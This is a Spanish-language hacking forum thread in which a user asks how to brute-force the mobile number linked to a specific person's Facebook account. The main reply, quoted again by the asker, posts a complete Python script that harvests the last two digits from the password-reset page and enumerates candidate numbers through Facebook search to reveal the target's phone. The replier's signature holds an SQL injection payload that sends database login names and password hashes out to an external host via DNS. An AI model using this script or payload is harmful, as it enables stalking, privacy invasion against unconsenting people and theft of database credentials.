Es posible realizar facebook phone number brute force

Iniciado por lug, Enero 31, 2017, 03:43:34 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Enero 31, 2017, 03:43:34 AM
Buenas compañeros del foro, tengo la duda si aún es posible realizar el brute forcing de numeros celulares para vincularlos a una cuenta de facebook.

Tengo un usuario de facebook del que quiero saber el numero de telefono celular, gracias a las opciones de restablecimiento de contraseña conozco los 2 ultimos digitos del telefono, entonces quiero hacer un ataque de fuerza bruta para sacar el numero.

Facebook en esta URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nos muestra a que perfil está vinculado un nombre de usuario o telefono, quiero hacer fuerza bruta concatenando los posibles prefijos de mi pais + 5 digitos que desconozco + los 2 ultimos que conozco.

Buscando encontré este script: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el cual no funciona ya, no sé si porque facebook implementó alguna protección o porque el diseño de la web cambió y según veo el script parsea el html para encontrar donde insertar los 2 ultimos numeros.

Alguien sabe si este tipo de ataque aún es viable en facebook ? conocen algún otro script para realizar esto ?


Gracais y un saludo.
Enero 31, 2017, 06:02:14 PM #1
Código: python
import urllib2
import re
import threading
import sys

 
manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
user = raw_input("Username: ")
a = urllib2.build_opener()
a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
a.addheaders.append(('Cookie',manual_cookie))
cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]

cc = raw_input("Country Code: ")
nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")

file_save = open('out.txt','a')
opener = urllib2.build_opener()
url = 'http://www.facebook.com/search/more?q=%2B'
zeroz = 0
manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
print "[+] Threads are Set To Default To 5\n[+] Bruting Started"


def brute(manual_cookie,number):
   page = url + number
   opener.addheaders.append(('Cookie', manual_cookie))
   get = opener.open(page)
   html = get.read()
   acc = re.findall('<div class="_zs fwb" data-bt="{&quot;ct&quot;:&quot;title&quot;}"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
   accc = re.findall('<div class="_zs fwb" data-bt="{&quot;ct&quot;:&quot;title&quot;}"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
   if acc:
      if re.findall(user, html):
         print "\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n"
         file_save.write("\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n\n\n")         
         print "Good Luck"
         sys.exit()
      else:
         print "[+] " + acc[0] + " => +" + str(number)
         file_save.write("[+] " + acc[0] + " => +" + str(number) + "\n")
   elif accc:
      if re.findall(user, html):
         print "\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n"
         file_save.write("\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n\n\n")         
         print "Good Luck"
         sys.exit()
      else:
         print "[+] " + accc[0] + " => +" + str(number)
         file_save.write("[+] " + accc[0] + " => +" + str(number) + "\n")

   else:
      print "[-] => +" + str(number)
      
   
while int(len(str(zeroz))) < int(nb_bt)+1:
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
   t=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
   to=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
   tt=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
   tth=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
   tf=threading.Thread(target=brute,args=(manual_cookie,number,))
   t.start()
   to.start()
   tt.start()
   tth.start()
   tf.start()
   t.join()
   to.join()
   tt.join()
   tth.join()
   tf.join()
   zeroz += 5
   while 1:
      break


file_save.close()


Start studying the code and try ... "upgrade the wheel" and not create something from scratch... You use the script correctly? ,  put the manual cookie properly? .. .

bye
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--
Febrero 01, 2017, 05:02:20 AM #2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: python
import urllib2
import re
import threading
import sys

 
manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
user = raw_input("Username: ")
a = urllib2.build_opener()
a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
a.addheaders.append(('Cookie',manual_cookie))
cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]

cc = raw_input("Country Code: ")
nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")

file_save = open('out.txt','a')
opener = urllib2.build_opener()
url = 'http://www.facebook.com/search/more?q=%2B'
zeroz = 0
manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
print "[+] Threads are Set To Default To 5\n[+] Bruting Started"


def brute(manual_cookie,number):
   page = url + number
   opener.addheaders.append(('Cookie', manual_cookie))
   get = opener.open(page)
   html = get.read()
   acc = re.findall('<div class="_zs fwb" data-bt="{&quot;ct&quot;:&quot;title&quot;}"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
   accc = re.findall('<div class="_zs fwb" data-bt="{&quot;ct&quot;:&quot;title&quot;}"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
   if acc:
      if re.findall(user, html):
         print "\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n"
         file_save.write("\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n\n\n")         
         print "Good Luck"
         sys.exit()
      else:
         print "[+] " + acc[0] + " => +" + str(number)
         file_save.write("[+] " + acc[0] + " => +" + str(number) + "\n")
   elif accc:
      if re.findall(user, html):
         print "\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n"
         file_save.write("\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n\n\n")         
         print "Good Luck"
         sys.exit()
      else:
         print "[+] " + accc[0] + " => +" + str(number)
         file_save.write("[+] " + accc[0] + " => +" + str(number) + "\n")

   else:
      print "[-] => +" + str(number)
      
   
while int(len(str(zeroz))) < int(nb_bt)+1:
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
   t=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
   to=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
   tt=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
   tth=threading.Thread(target=brute,args=(manual_cookie,number,))
   number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
   tf=threading.Thread(target=brute,args=(manual_cookie,number,))
   t.start()
   to.start()
   tt.start()
   tth.start()
   tf.start()
   t.join()
   to.join()
   tt.join()
   tth.join()
   tf.join()
   zeroz += 5
   while 1:
      break


file_save.close()


Start studying the code and try ... "upgrade the wheel" and not create something from scratch... You use the script correctly? ,  put the manual cookie properly? .. .

bye
Gracias por la respuesta, el asunto es que facebook manda varias peticiones al insertar el usuario y no sé cual de esas multiples cookies que se generan se debe usar.
Por otro lado el script tira error porque intenta parsear del codigo fuente de la web de respuesta creo los 2 ultimos digitos, como el diseño de esta pagina de respuesta no es el mismo al momento de crear el script falla.

De todas formas gracias por la respuesta, intentaré basarme en este codigo para intentar crearme uno propio, aunque queria saber si alguien habia usado este tipo de ataque, si aún es factible o facebook tienen algún sistema para bloquear este tipo de fuerza bruta al numero.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario